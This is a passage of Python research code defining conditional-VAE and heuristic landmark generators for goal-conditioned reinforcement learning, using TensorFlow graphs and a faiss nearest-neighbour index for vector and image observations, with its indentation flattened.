self.hidden_dim = 400
self.z_dim = 50
self.batch_size = batch_size
self.num_training_steps = num_training_steps
self.learning_threshold = learning_threshold
self.max_nn_index_size = max_nn_index_size
if self.goal_extraction_function is None:
raise ValueError("NonScoreBasedVAEWithNNRefinement requires a goal_extraction function!")
self.steps = 0
## Replay Buffers ##
self.landmarks = np.zeros((0, self.ob_space.shape[-1]))
self.landmark_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape),
("action", self.ac_space.shape),
("landmark", self.ob_space.shape),
("desired_goal", self.goal_space.shape),
("scores", (2,)) # score & ratio
])
## NN Index ##
self.d = self.ob_space.shape[-1]
self.index = faiss.IndexFlatL2(self.d)
if _init_setup_model:
self._setup_model()
def _setup_model(self):
## CVAE Graph ##
self.graph = tf.Graph()
with self.graph.as_default():
self.sess = tf_util.make_session(graph=self.graph)
with tf.variable_scope("scorevae"):
sag_len = self.ob_space.shape[-1] + self.goal_space.shape[-1] + 2
if self.use_actions:
sag_len += self.ac_space.shape[-1]
state_action_goal_scores = tf.placeholder(tf.float32, [None, sag_len], name='sag_placeholder')
landmark = tf.placeholder(tf.float32, [None, self.ob_space.shape[-1]], name='lm_placeholder')
# encoder
h = tf.layers.dense(tf.concat([state_action_goal_scores, landmark], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
mu = tf.layers.dense(h, self.z_dim)
log_variance = tf.layers.dense(h, self.z_dim)
z = tf.random_normal(shape=tf.shape(mu)) * tf.sqrt(tf.exp(log_variance)) + mu
# decoder
h = tf.layers.dense(tf.concat([state_action_goal_scores, z], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
generated_landmark = tf.layers.dense(h, self.ob_space.shape[-1])
# Distortion is the negative log likelihood: P(X|z,c)
l2_loss = tf.reduce_sum(tf.squared_difference(landmark, generated_landmark), 1)
tf.summary.scalar("VAE_distortion_l2Loss", tf.reduce_mean(l2_loss))
# The rate is the D_KL(Q(z|X,y)||P(z|c))
latent_loss = -0.5*tf.reduce_sum(1.0 + log_variance - tf.square(mu) - tf.exp(log_variance), 1)
tf.summary.scalar("VAE_rate_LatentLoss", tf.reduce_mean(latent_loss))
loss = tf.reduce_mean(l2_loss + latent_loss)
tf.summary.scalar("VAE_elbo", loss)
opt = tf.train.AdamOptimizer()
gradients = opt.compute_gradients(loss, var_list=tf.trainable_variables())
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, 1.), var)
ts = opt.apply_gradients(gradients)
init = tf.global_variables_initializer()
self.summary = tf.summary.merge_all()
self.params = tf.global_variables("scorevae")
self.sess.run(init)
self.g = {
'sagadd_ph': state_action_goal_scores,
'lm_ph': landmark,
'z': z,
'generated_landmark': generated_landmark,
'loss': loss,
'ts': ts,
'summary': self.summary
}
def add_state_data(self, states, goals):
"""Add state data to buffer (for initial random generation), and also to NN Index"""
self.landmarks = np.concatenate((self.landmarks, states), 0)
self.index.add(states.astype('float32'))
nn_size = self.index.ntotal
if nn_size > self.max_nn_index_size:
#prune half of the nn database
#I verified that this works as intended: when we remove ids from faiss, all ids get bumped up.
self.index.remove_ids(faiss.IDSelectorRange(0, self.max_nn_index_size//2))
self.landmarks = self.landmarks[self.max_nn_index_size//2:]
nn_size = self.index.ntotal
assert(len(self.landmarks) == nn_size)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional):
self.landmark_buffer.add_batch(states, actions, landmarks, desired_goals, additional)
loss = 0
# run some training steps
for _ in range(self.num_training_steps):
self.steps += 1
s, a, l, g, add = self.landmark_buffer.sample(self.batch_size)
if self.use_actions:
feed_dict = {self.g['sagadd_ph']: np.concatenate((s, a, g, add), axis=1),
self.g['lm_ph']: l}
else:
feed_dict = {self.g['sagadd_ph']: np.concatenate((s, g, add), axis=1),
self.g['lm_ph']: l}
_, loss_, summary = self.sess.run([self.g['ts'], self.g['loss'], self.g['summary']], feed_dict=feed_dict)
loss += loss_
if self.steps % 100 == 0:
print("Landmark CVAE step {}: loss {}".format(self.steps, loss / self.num_training_steps))
return summary
def generate(self, states, actions, goals):
self.states = states
self.actions = actions
self.goals = goals
# Generate randomly at first
if self.steps < self.learning_threshold:
# Sample row indices; np.random.choice cannot sample rows of a 2-D array.
sample_idx = np.random.choice(len(self.landmarks), size=len(states))
self.landmark_states = landmark_states = self.landmarks[sample_idx]
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
# Otherwise, generate using the VAE
sampled_zs = np.random.normal(size=(len(states), self.z_dim))
scores = np.concatenate([np.ones((len(states), 1)), np.zeros((len(states), 1))], 1) # condition on score = 1, ratio = 0.
if self.use_actions:
feed_dict = {self.g['z']: sampled_zs, self.g['sagadd_ph']: np.concatenate([states, actions, goals, scores], axis=1)}
else:
feed_dict = {self.g['z']: sampled_zs, self.g['sagadd_ph']: np.concatenate([states, goals, scores], axis=1)}
landmark_states = self.sess.run(self.g['generated_landmark'], feed_dict=feed_dict)
if self.refine_with_NN:
query = landmark_states.astype('float32')
_, lidxs = self.index.search(query, 1)
landmark_states = self.landmarks[lidxs[:,0]]
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# No-op: this generator consumes scores through the `additional` field of
# add_landmark_experience_data (see get_scores_with_experiences above).
pass
def __len__(self):
return self.index.ntotal
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
data = {
"get_scores_with_experiences": self.get_scores_with_experiences,
"landmark_buffer": self.landmark_buffer,
"refine_with_NN": self.refine_with_NN,
"use_actions": self.use_actions,
"hidden_dim": self.hidden_dim,
"z_dim": self.z_dim,
"batch_size": self.batch_size,
"num_training_steps": self.num_training_steps,
"learning_threshold": self.learning_threshold,
"max_nn_index_size": self.max_nn_index_size,
"steps": self.steps,
"landmarks": self.landmarks,
"d": self.d,
"ac_space": self.ac_space,
"ob_space": self.ob_space,
"goal_space": self.goal_space,
"goal_extraction_function": self.goal_extraction_function,
"buffer_size": self.buffer_size,
"env": self.env
}
index_filename = save_path + '.faiss_idx'
faiss.write_index(self.index, index_filename)
# Model parameters to be restored
params = self.sess.run(self.params)
self._save_to_file(save_path, data=data, params=params)
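# Sketch of the optimistic conditioning used by the score-based variant above:
# at generation time the CVAE is conditioned on (score=1, ratio=0), i.e. it is
# asked for landmarks that historically scored well. Hypothetical batch size;
# the expression mirrors `generate` above.
def _example_optimistic_scores(batch_size):
    return np.concatenate([np.ones((batch_size, 1)), np.zeros((batch_size, 1))], 1)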
class FetchPushHeuristicGenerator(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=_init_setup_model)
self.landmarks = np.zeros((0, self.ob_space.shape[-1]))
self.d = self.ob_space.shape[-1]
self.index = faiss.IndexFlatL2(self.d)
self.max_nn_index_size = 200000
def add_state_data(self, states, goals):
"""Add state data to buffer (for initial random generation), and also to NN Index"""
self.landmarks = np.concatenate((self.landmarks, states), 0)
self.index.add(states.astype('float32'))
nn_size = self.index.ntotal
if nn_size > self.max_nn_index_size:
#prune half of the nn database
#I verified that this works as intended: when we remove ids from faiss, all ids get bumped up.
self.index.remove_ids(faiss.IDSelectorRange(0, self.max_nn_index_size//2))
self.landmarks = self.landmarks[self.max_nn_index_size//2:]
nn_size = self.index.ntotal
assert(len(self.landmarks) == nn_size)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional):
pass
def generate(self, states, actions, goals):
"""6 dim goals"""
goal_pos = goals[:, :3]
obj_pos = states[:, 3:6]
gripper_state = states[:, 9:11]
obj_rot = states[:, 11:14]
goal_direction = goal_pos - obj_pos
# Normalize each row's direction vector. The original batch-wide 1-norm
# produced a single scalar, not per-row lengths.
normalized_goal_direction = goal_direction / np.linalg.norm(goal_direction, axis=1, keepdims=True)
landmark_states = np.concatenate([
obj_pos - normalized_goal_direction * 0.15,
obj_pos,
normalized_goal_direction * 0.15,
gripper_state,
obj_rot,
np.zeros((len(states), 11))
], 1)
query = landmark_states.astype('float32')
_, lidxs = self.index.search(query, 1)
landmark_states = self.landmarks[lidxs[:,0]]
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# Do Nothing (this is not a score-based generator)
pass
def __len__(self):
# The heuristic itself learns nothing; the NN index is only used to snap
# hand-built landmarks onto visited states.
return 0
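# Note on the heuristic above: the hand-built landmark places the gripper
# 0.15 m behind the object along the object-to-goal direction and zeroes the
# remaining (velocity) dimensions. The slicing assumes the standard 25-dim
# FetchPush observation layout (grip_pos[0:3], object_pos[3:6],
# object_rel_pos[6:9], gripper_state[9:11], object_rot[11:14]); treat those
# offsets as an assumption if a wrapper changes the layout.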
class NonScoreBasedImageVAEWithNNRefinement(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, refine_with_NN=False, use_actions=True, batch_size=128, num_training_steps=100,
learning_threshold=100, max_nn_index_size=200000, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=_init_setup_model)
self.refine_with_NN = refine_with_NN
self.use_actions = use_actions
self.hidden_dim = 400
self.z_dim = 50
self.batch_size = batch_size
self.num_training_steps = num_training_steps
self.learning_threshold = learning_threshold
self.max_nn_index_size = max_nn_index_size
if self.goal_extraction_function is None:
raise ValueError("NonScoreBasedVAEWithNNRefinement requires a goal_extraction function!")
self.steps = 0
## Replay Buffers ##
self.landmarks = np.zeros((0, np.prod(self.ob_space.shape)))
self.landmark_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape),
("action", self.ac_space.shape),
("landmark", self.ob_space.shape),
("desired_goal", self.goal_space.shape)
])
## NN Index ##
self.d = np.prod(self.ob_space.shape)
self.index = faiss.IndexFlatL2(int(self.d))
if _init_setup_model:
self._setup_model()
def _setup_model(self):
## CVAE Graph ##
self.graph = tf.Graph()
with self.graph.as_default():
self.sess = tf_util.make_session(graph=self.graph)
with tf.variable_scope("lervae"):
sag_len = np.prod(self.ob_space.shape) + np.prod(self.goal_space.shape)
if self.use_actions:
sag_len += self.ac_space.n
state_action_goal = tf.placeholder(tf.float32, [None, sag_len], name='sag_placeholder')
landmark = tf.placeholder(tf.float32, [None, np.prod(self.ob_space.shape)], name='lm_placeholder')
# encoder
h = tf.layers.dense(tf.concat([state_action_goal, landmark], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
mu = tf.layers.dense(h, self.z_dim)
log_variance = tf.layers.dense(h, self.z_dim)
z = tf.random_normal(shape=tf.shape(mu)) * tf.sqrt(tf.exp(log_variance)) + mu
# decoder
h = tf.layers.dense(tf.concat([state_action_goal, z], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
generated_landmark = tf.layers.dense(h, np.prod(self.ob_space.shape))
# Distortion is the negative log likelihood: P(X|z,c)
l2_loss = tf.reduce_sum(tf.squared_difference(landmark, generated_landmark), 1)
# The rate is the D_KL(Q(z|X,y)||P(z|c))
latent_loss = -0.5 * tf.reduce_sum(1.0 + log_variance - tf.square(mu) - tf.exp(log_variance), 1)
loss = tf.reduce_mean(l2_loss + latent_loss)
with tf.variable_scope("vae_loss"):
tf.summary.scalar("VAE_distortion_l2Loss", tf.reduce_mean(l2_loss))
tf.summary.scalar("VAE_rate_LatentLoss", tf.reduce_mean(latent_loss))
tf.summary.scalar("VAE_elbo", loss)
opt = tf.train.AdamOptimizer()
gradients = opt.compute_gradients(loss, var_list=tf.trainable_variables())
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, 1.), var)
ts = opt.apply_gradients(gradients)
init = tf.global_variables_initializer()
# TODO: Log the generated outputs
with tf.variable_scope("VAE_training_info", reuse=False):
generated_landmark_orig_shape = tf.reshape(generated_landmark, [-1] + list(self.ob_space.shape))
tf.summary.image("VAE_gen_landmark", generated_landmark_orig_shape, max_outputs=1)
landmark_orig_shape = tf.reshape(landmark, [-1] + list(self.ob_space.shape))
tf.summary.image("VAE_train_landmark", landmark_orig_shape, max_outputs=1)
# Split the SAG placeholder tensor into its individual components
if self.use_actions:
state_ph, action_ph, goal_ph = tf.split(state_action_goal, [np.prod(self.ob_space.shape), self.ac_space.n, np.prod(self.goal_space.shape)], 1)
action_shape = tf.reshape(action_ph, [-1, self.ac_space.n, 1, 1])
tf.summary.image("VAE_action_input", action_shape, max_outputs=1)
else:
state_ph, goal_ph = tf.split(state_action_goal, [np.prod(self.ob_space.shape), np.prod(self.goal_space.shape)], 1)
# Reshape
state_orig_shape = tf.reshape(state_ph, [-1] + list(self.ob_space.shape))
goal_orig_shape = tf.reshape(goal_ph, [-1] + list(self.goal_space.shape))
tf.summary.image("VAE_state_input", state_orig_shape, max_outputs=1)
tf.summary.image("VAE_goal_input", goal_orig_shape, max_outputs=1)
self.summary = tf.summary.merge_all()
self.params = tf.global_variables("lervae")
self.sess.run(init)
self.g = {
'sag_ph': state_action_goal,
'lm_ph': landmark,
'z': z,
'generated_landmark': generated_landmark,
'loss': loss,
'ts': ts,
'summary': self.summary
}
def add_state_data(self, states, goals):
"""Add state data to buffer (for initial random generation), and also to NN Index"""
states = np.reshape(states, [states.shape[0], -1]) # Reshape to batch_size x (H * W * C)
self.landmarks = np.concatenate((self.landmarks, states), 0)
self.index.add(states.astype('float32'))
nn_size = self.index.ntotal
if nn_size > self.max_nn_index_size:
# prune half of the nn database
# I verified that this works as intended: when we remove ids from faiss, all ids get bumped up.
self.index.remove_ids(faiss.IDSelectorRange(0, self.max_nn_index_size // 2))
self.landmarks = self.landmarks[self.max_nn_index_size // 2:]
nn_size = self.index.ntotal
assert (len(self.landmarks) == nn_size)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional=None):
self.landmark_buffer.add_batch(states, actions, landmarks, desired_goals)
loss = 0
# run some training steps
for _ in range(self.num_training_steps):
self.steps += 1
s_, a_, l_, g_ = self.landmark_buffer.sample(self.batch_size)
s = np.reshape(s_, [-1, np.prod(self.ob_space.shape)])
l = np.reshape(l_, [-1, np.prod(self.ob_space.shape)])
g = np.reshape(g_, [-1, np.prod(self.goal_space.shape)])  # goals live in goal_space, not ob_space
a = self.get_one_hot(a_.astype(int), self.ac_space.n)
if self.use_actions:
feed_dict = {self.g['sag_ph']: np.concatenate((s, a, g), axis=1),
self.g['lm_ph']: l}
else:
feed_dict = {self.g['sag_ph']: np.concatenate((s, g), axis=1),
self.g['lm_ph']: l}
_, loss_, summary = self.sess.run([self.g['ts'], self.g['loss'], self.g['summary']], feed_dict=feed_dict)
loss += loss_
if self.steps % 100 == 0:
print("Landmark CVAE step {}: loss {}".format(self.steps, loss / self.num_training_steps))
return summary
def generate(self, states, actions, goals):
self.states = states
self.actions = actions
self.goals = goals
# Generate randomly at first
if self.steps < self.learning_threshold:
sample_idx = np.random.choice(len(self.landmarks), len(states))
landmark_states = self.landmarks[sample_idx]
# Reshape it back to batch_size x H x W x C
landmark_states = np.reshape(landmark_states, [-1] + list(self.ob_space.shape))
self.landmark_states = landmark_states
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
# Otherwise, generate using the VAE
states = np.reshape(states, [-1, np.prod(self.ob_space.shape)])
goals = np.reshape(goals, [-1, np.prod(self.goal_space.shape)])  # goals live in goal_space, not ob_space
actions = self.get_one_hot(actions.astype(int), self.ac_space.n)
sampled_zs = np.random.normal(size=(len(states), self.z_dim))
if self.use_actions:
feed_dict = {self.g['z']: sampled_zs, self.g['sag_ph']: np.concatenate([states, actions, goals], axis=1)}
else:
feed_dict = {self.g['z']: sampled_zs, self.g['sag_ph']: np.concatenate([states, goals], axis=1)}
landmark_states = self.sess.run(self.g['generated_landmark'], feed_dict=feed_dict)
if self.refine_with_NN:
query = landmark_states.astype('float32')
_, lidxs = self.index.search(query, 1)
landmark_states = self.landmarks[lidxs[:, 0]]
# Reshape the landmark_states and goals back
landmark_states = np.reshape(landmark_states, [-1] + list(self.ob_space.shape))
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# Do Nothing (this is not a score-based generator)
pass
def __len__(self):
return self.index.ntotal
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
data = {
"landmark_buffer": self.landmark_buffer,
"refine_with_NN": self.refine_with_NN,
"use_actions": self.use_actions,
"hidden_dim": self.hidden_dim,
"z_dim": self.z_dim,
"batch_size": self.batch_size,
"num_training_steps": self.num_training_steps,
"learning_threshold": self.learning_threshold,
"max_nn_index_size": self.max_nn_index_size,
"steps": self.steps,
"landmarks": self.landmarks,
"d": self.d,
"ac_space": self.ac_space,
"ob_space": self.ob_space,
"goal_space": self.goal_space,
"goal_extraction_function": self.goal_extraction_function,
"buffer_size": self.buffer_size,
"env": self.env
}
index_filename = save_path + '.faiss_idx'
faiss.write_index(self.index, index_filename)
# Model parameters to be restored
params = self.sess.run(self.params)
self._save_to_file(save_path, data=data, params=params)
def get_one_hot(self, targets, nb_classes):
"""One-hot encode integer targets; output shape is targets.shape + (nb_classes,)."""
res = np.eye(nb_classes)[np.array(targets).reshape(-1)]
return res.reshape(list(targets.shape) + [nb_classes])
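# Quick illustration of the one-hot helper above (hypothetical values):
# get_one_hot(np.array([0, 2]), 3) -> [[1., 0., 0.], [0., 0., 1.]], i.e. an
# input of shape (batch,) yields (batch, nb_classes), ready to concatenate
# with the flattened state and goal features.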
class ScoreBasedImageVAEWithNNRefinement(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, refine_with_NN=False, use_actions=True, batch_size=128, num_training_steps=100,
learning_threshold=100, max_nn_index_size=200000, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=_init_setup_model)
self.get_scores_with_experiences = True
self.refine_with_NN = refine_with_NN
self.use_actions = use_actions
self.hidden_dim = 400
self.z_dim = 50
self.batch_size = batch_size
self.num_training_steps = num_training_steps
self.learning_threshold = learning_threshold
self.max_nn_index_size = max_nn_index_size
if self.goal_extraction_function is None:
raise ValueError("NonScoreBasedVAEWithNNRefinement requires a goal_extraction function!")
self.steps = 0
## Replay Buffers ##
self.landmarks = np.zeros((0, np.prod(self.ob_space.shape)))
self.landmark_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape),
("action", self.ac_space.shape),
("landmark", self.ob_space.shape),
("desired_goal", self.goal_space.shape),
("scores", (2,)) # score & ratio
])
## NN Index ##
self.d = np.prod(self.ob_space.shape)
self.index = faiss.IndexFlatL2(int(self.d))
if _init_setup_model:
self._setup_model()
def _setup_model(self):
## CVAE Graph ##
self.graph = tf.Graph()
with self.graph.as_default():
self.sess = tf_util.make_session(graph=self.graph)
with tf.variable_scope("scorevae"):
sag_len = np.prod(self.ob_space.shape) + np.prod(self.goal_space.shape) + 2
if self.use_actions:
sag_len += self.ac_space.n
state_action_goal_scores = tf.placeholder(tf.float32, [None, sag_len], name='sag_placeholder')
landmark = tf.placeholder(tf.float32, [None, np.prod(self.ob_space.shape)], name='lm_placeholder')
# encoder
h = tf.layers.dense(tf.concat([state_action_goal_scores, landmark], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
mu = tf.layers.dense(h, self.z_dim)
log_variance = tf.layers.dense(h, self.z_dim)
z = tf.random_normal(shape=tf.shape(mu)) * tf.sqrt(tf.exp(log_variance)) + mu
# decoder
h = tf.layers.dense(tf.concat([state_action_goal_scores, z], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
generated_landmark = tf.layers.dense(h, np.prod(self.ob_space.shape))
# Distortion is the negative log likelihood: P(X|z,c)
# TODO: Consider a Bernoulli (sigmoid cross-entropy) likelihood for binary
# image pixels instead of the Gaussian/L2 distortion below.
l2_loss = tf.reduce_sum(tf.squared_difference(landmark, generated_landmark), 1)
# The rate is the D_KL(Q(z|X,y)||P(z|c))
latent_loss = -0.5 * tf.reduce_sum(1.0 + log_variance - tf.square(mu) - tf.exp(log_variance), 1)
loss = tf.reduce_mean(l2_loss + latent_loss)
with tf.variable_scope("vae_loss"):
tf.summary.scalar("VAE_distortion_l2Loss", tf.reduce_mean(l2_loss))
tf.summary.scalar("VAE_rate_LatentLoss", tf.reduce_mean(latent_loss))
tf.summary.scalar("VAE_elbo", loss)
opt = tf.train.AdamOptimizer()
gradients = opt.compute_gradients(loss, var_list=tf.trainable_variables())
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, 1.), var)
ts = opt.apply_gradients(gradients)
init = tf.global_variables_initializer()
# TODO: Log the generated outputs
with tf.variable_scope("VAE_training_info", reuse=False):
generated_landmark_orig_shape = tf.reshape(generated_landmark, [-1] + list(self.ob_space.shape))
tf.summary.image("VAE_gen_landmark", generated_landmark_orig_shape, max_outputs=1)
landmark_orig_shape = tf.reshape(landmark, [-1] + list(self.ob_space.shape))
tf.summary.image("VAE_train_landmark", landmark_orig_shape, max_outputs=1)
# Split the SAG placeholder tensor into its individual components
if self.use_actions:
state_ph, action_ph, goal_ph, scores_ph = tf.split(state_action_goal_scores, [np.prod(self.ob_space.shape), self.ac_space.n, np.prod(self.goal_space.shape), 2], 1)
action_shape = tf.reshape(action_ph, [-1, self.ac_space.n, 1, 1])
tf.summary.image("VAE_action_input", action_shape, max_outputs=1)
else:
# The placeholder in this class is `state_action_goal_scores`; the previous
# reference to `state_action_goal` was a NameError.
state_ph, goal_ph, scores_ph = tf.split(state_action_goal_scores, [np.prod(self.ob_space.shape), np.prod(self.goal_space.shape), 2], 1)
# Reshape
state_orig_shape = tf.reshape(state_ph, [-1] + list(self.ob_space.shape))
goal_orig_shape = tf.reshape(goal_ph, [-1] + list(self.goal_space.shape))
tf.summary.image("VAE_state_input", state_orig_shape, max_outputs=1)
tf.summary.image("VAE_goal_input", goal_orig_shape, max_outputs=1)
self.summary = tf.summary.merge_all()
self.params = tf.global_variables("scorevae")
self.sess.run(init)
self.g = {
'sagadd_ph': state_action_goal_scores,
'lm_ph': landmark,
'z': z,
'generated_landmark': generated_landmark,
'loss': loss,
'ts': ts,
'summary': self.summary
}
def add_state_data(self, states, goals):
"""Add state data to buffer (for initial random generation), and also to NN Index"""
states = np.reshape(states, [states.shape[0], -1]) # Reshape to batch_size x (H * W * C)
self.landmarks = np.concatenate((self.landmarks, states), 0)
self.index.add(states.astype('float32'))
nn_size = self.index.ntotal
if nn_size > self.max_nn_index_size:
# prune half of the nn database
# I verified that this works as intended: when we remove ids from faiss, all ids get bumped up.
self.index.remove_ids(faiss.IDSelectorRange(0, self.max_nn_index_size // 2))
self.landmarks = self.landmarks[self.max_nn_index_size // 2:]
nn_size = self.index.ntotal
assert (len(self.landmarks) == nn_size)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional):
self.landmark_buffer.add_batch(states, actions, landmarks, desired_goals, additional)
loss = 0
# run some training steps
for _ in range(self.num_training_steps):
self.steps += 1
s_, a_, l_, g_, add = self.landmark_buffer.sample(self.batch_size)
s = np.reshape(s_, [-1, np.prod(self.ob_space.shape)])
l = np.reshape(l_, [-1, np.prod(self.ob_space.shape)])
g = np.reshape(g_, [-1, np.prod(self.goal_space.shape)])  # goals live in goal_space, not ob_space
a = self.get_one_hot(a_.astype(int), self.ac_space.n)
if self.use_actions:
feed_dict = {self.g['sagadd_ph']: np.concatenate((s, a, g, add), axis=1),
self.g['lm_ph']: l}
else:
feed_dict = {self.g['sagadd_ph']: np.concatenate((s, g, add), axis=1),
self.g['lm_ph']: l}
_, loss_, summary = self.sess.run([self.g['ts'], self.g['loss'], self.g['summary']], feed_dict=feed_dict)
loss += loss_
if self.steps % 100 == 0:
print("Landmark CVAE step {}: loss {}".format(self.steps, loss / self.num_training_steps))
return summary
def generate(self, states, actions, goals):
self.states = states
self.actions = actions
self.goals = goals
# Generate randomly at first
if self.steps < self.learning_threshold:
sample_idx = np.random.choice(len(self.landmarks), len(states))
landmark_states = self.landmarks[sample_idx]
# Reshape it back to batch_size x H x W x C
landmark_states = np.reshape(landmark_states, [-1] + list(self.ob_space.shape))
self.landmark_states = landmark_states
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
# Otherwise, generate using the VAE
states = np.reshape(states, [-1, np.prod(self.ob_space.shape)])
goals = np.reshape(goals, [-1, np.prod(self.goal_space.shape)])  # goals live in goal_space, not ob_space
actions = self.get_one_hot(actions.astype(int), self.ac_space.n)
sampled_zs = np.random.normal(size=(len(states), self.z_dim))
scores = np.concatenate([np.ones((len(states), 1)), np.zeros((len(states), 1))], 1) # condition on score = 1, ratio = 0.
if self.use_actions:
feed_dict = {self.g['z']: sampled_zs, self.g['sagadd_ph']: np.concatenate([states, actions, goals, scores], axis=1)}
else:
feed_dict = {self.g['z']: sampled_zs, self.g['sagadd_ph']: np.concatenate([states, goals, scores], axis=1)}
landmark_states = self.sess.run(self.g['generated_landmark'], feed_dict=feed_dict)
if self.refine_with_NN:
query = landmark_states.astype('float32')
_, lidxs = self.index.search(query, 1)
landmark_states = self.landmarks[lidxs[:, 0]]
# Reshape the landmark_states and goals back
landmark_states = np.reshape(landmark_states, [-1] + list(self.ob_space.shape))
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# No-op: this generator consumes scores through the `additional` field of
# add_landmark_experience_data (see get_scores_with_experiences above).
pass
def __len__(self):
return self.index.ntotal
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
data = {
"get_scores_with_experiences": self.get_scores_with_experiences,
"landmark_buffer": self.landmark_buffer,
"refine_with_NN": self.refine_with_NN,
"use_actions": self.use_actions,
"hidden_dim": self.hidden_dim,
"z_dim": self.z_dim,
"batch_size": self.batch_size,
"num_training_steps": self.num_training_steps,
"learning_threshold": self.learning_threshold,
"max_nn_index_size": self.max_nn_index_size,
"steps": self.steps,
"landmarks": self.landmarks,
"d": self.d,
"ac_space": self.ac_space,
"ob_space": self.ob_space,
"goal_space": self.goal_space,
"goal_extraction_function": self.goal_extraction_function,
"buffer_size": self.buffer_size,
"env": self.env
}
index_filename = save_path + '.faiss_idx'
faiss.write_index(self.index, index_filename)
# Model parameters to be restored
params = self.sess.run(self.params)
self._save_to_file(save_path, data=data, params=params)
def get_one_hot(self, targets, nb_classes):
"""One-hot encode integer targets; output shape is targets.shape + (nb_classes,)."""
res = np.eye(nb_classes)[np.array(targets).reshape(-1)]
return res.reshape(list(targets.shape) + [nb_classes])
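# Sketch of the flattening convention shared by both image generators above
# (hypothetical shapes): (B, H, W, C) observations are flattened to
# (B, H*W*C) before entering the dense CVAE and the faiss index, then
# reshaped back before goal extraction.
def _example_image_flatten_roundtrip(obs_batch, ob_shape):
    flat = np.reshape(obs_batch, [obs_batch.shape[0], -1])
    return np.reshape(flat, [-1] + list(ob_shape))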